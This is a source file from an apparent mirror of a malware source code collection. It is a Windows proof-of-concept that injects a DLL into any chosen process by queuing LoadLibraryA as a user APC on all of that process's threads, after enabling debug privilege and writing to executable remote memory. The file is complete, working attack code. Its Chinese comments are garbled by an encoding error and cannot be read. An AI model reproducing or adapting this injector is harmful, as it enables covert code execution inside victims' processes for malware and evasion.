ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-23 11:55:26 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
6672ee3eba
MalwareSourceCode/Win32/Proof of Concepts/UserApcInject/UserAPC/UserAPC.cpp

139 lines
3.9 KiB
C++
Raw Normal View History

updates and moves n/a
2022-04-12 01:00:13 +00:00
/************************************************************************
*
* 1<EFBFBD><EFBFBD><EFBFBD><EFBFBD>EXE<EFBFBD><EFBFBD>ij<EFBFBD><EFBFBD><EFBFBD>߳<EFBFBD>ִ<EFBFBD>е<EFBFBD>SleepEx()<EFBFBD><EFBFBD><EFBFBD><EFBFBD>WaitForSingleObjectEx()ʱ<EFBFBD><EFBFBD>ϵͳ<EFBFBD>ͻ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>жϡ<EFBFBD>
* 2<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>߳<EFBFBD><EFBFBD>ٴα<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʱ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̻߳<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ִ<EFBFBD><EFBFBD>APC<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>еı<EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD>ĺ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
* 3<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>QueueUserAPC()<EFBFBD><EFBFBD><EFBFBD><EFBFBD>API<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ж<EFBFBD>ʱ<EFBFBD><EFBFBD><EFBFBD>̵߳<EFBFBD>APC<EFBFBD><EFBFBD><EFBFBD>в<EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ָ<EFBFBD><EFBFBD>
* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Dz<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Loadlibrary()ִ<EFBFBD>к<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܴע<EFBFBD><EFBFBD>DLL<EFBFBD><EFBFBD>Ŀ<EFBFBD>ġ<EFBFBD>
* 4) <EFBFBD>߳<EFBFBD><EFBFBD>и<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>״̬<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ΪFALSE<EFBFBD><EFBFBD><EFBFBD>򲻻<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD>APC<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
*************************************************************************/
#include "stdafx.h"
#include "UserAPC.h"
#include <windows.h>
#include <TlHelp32.h>
#include <iostream>
#include <string>
using namespace std;
#define DEF_BUF_SIZE 1024
BOOL AdjustPrivilege();
BOOL InjectModuleToProcessById(DWORD dwProcessId);
// <20><><EFBFBD>ڴ洢ע<E6B4A2><D7A2>ģ<EFBFBD><C4A3>DLL<4C><4C>·<EFBFBD><C2B7>ȫ<EFBFBD><C8AB>
char szDllPath[DEF_BUF_SIZE] = {0} ;
int _tmain(int argc, _TCHAR* argv[])
{
// ȡ<>õ<EFBFBD>ǰ<EFBFBD><C7B0><EFBFBD><EFBFBD>Ŀ¼·<C2BC><C2B7>
GetCurrentDirectoryA(DEF_BUF_SIZE, szDllPath);
// <20><><EFBFBD><EFBFBD>ע<EFBFBD><D7A2>ģ<EFBFBD><C4A3>DLL<4C><4C>·<EFBFBD><C2B7>ȫ<EFBFBD><C8AB>
#ifdef _WIN64
strcat ( szDllPath, "\\Dllx64.dll" ) ;
#else
strcat ( szDllPath, "\\Dllx86.dll" ) ;
#endif
DWORD dwProcessId = 0 ;
// <20><><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD><C4BF><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ID
while( cout << "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ID<EFBFBD><EFBFBD>" && cin >> dwProcessId && dwProcessId > 0 )
{
BOOL bRet = InjectModuleToProcessById(dwProcessId);
cout << (bRet ? "ע<EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>":"ע<EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>") << endl ;
}
return 0;
}
// ʹ<><CAB9>APC<50><43><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ָ<EFBFBD><D6B8>ID<49>Ľ<EFBFBD><C4BD><EFBFBD>ע<EFBFBD><D7A2>ģ<EFBFBD><C4A3>
BOOL InjectModuleToProcessById(DWORD dwProcessId)
{
SIZE_T dwRet = 0;
BOOL bStatus = FALSE ;
LPVOID lpData = NULL ;
UINT uLen = strlen(szDllPath) + 1;
AdjustPrivilege(); //
// <20><><EFBFBD><EFBFBD>Ŀ<EFBFBD><C4BF><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
if(hProcess)
{
// <20><><EFBFBD><EFBFBD><EFBFBD>ռ<EFBFBD>
lpData = VirtualAllocEx ( hProcess, NULL, uLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if ( lpData )
{
// д<><D0B4><EFBFBD><EFBFBD>Ҫע<D2AA><D7A2><EFBFBD><EFBFBD>ģ<EFBFBD><C4A3>·<EFBFBD><C2B7>ȫ<EFBFBD><C8AB>
bStatus = WriteProcessMemory(hProcess, lpData, szDllPath, uLen, (SIZE_T*)(&dwRet));
}
CloseHandle(hProcess);
}
if (bStatus == FALSE)
return FALSE ;
// <20><><EFBFBD><EFBFBD><EFBFBD>߳̿<DFB3><CCBF><EFBFBD>
THREADENTRY32 te32 = { sizeof(THREADENTRY32) };
HANDLE hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if(hThreadSnap == INVALID_HANDLE_VALUE)
return FALSE ;
bStatus = FALSE ;
// ö<><C3B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>߳<EFBFBD>
if(Thread32First(hThreadSnap, &te32))
{
do{
// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD>Ŀ<EFBFBD><C4BF><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD><D0B5>߳<EFBFBD>
if(te32.th32OwnerProcessID == dwProcessId)
{
// <20><><EFBFBD><EFBFBD><EFBFBD>߳<EFBFBD>
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);
if ( hThread )
{
// <20><>ָ<EFBFBD><D6B8><EFBFBD>߳<EFBFBD><DFB3><EFBFBD><EFBFBD><EFBFBD>APC
DWORD dwRet1 = QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)lpData);
if ( dwRet1 > 0 )
{
bStatus = TRUE ;
}
CloseHandle(hThread);
}
}
}while(Thread32Next ( hThreadSnap, &te32));
}
CloseHandle(hThreadSnap);
return bStatus;
}
BOOL AdjustPrivilege()
{
HANDLE hToken;
TOKEN_PRIVILEGES pTP;
LUID uID;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
{
printf("OpenProcessToken is Error\n");
return false;
}
if (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&uID)) //<2F><>ʽ
{
printf("LookupPrivilegeValue is Error\n");
return false;
}
pTP.PrivilegeCount = 1;
pTP.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
pTP.Privileges[0].Luid = uID;
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ǽ<EFBFBD><C7BD>е<EFBFBD><D0B5><EFBFBD>Ȩ<EFBFBD><C8A8>
if (!AdjustTokenPrivileges(hToken,false,&pTP,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
{
printf("AdjuestTokenPrivileges is Error\n");
return false;
}
return true;
}
Reference in New Issue Copy Permalink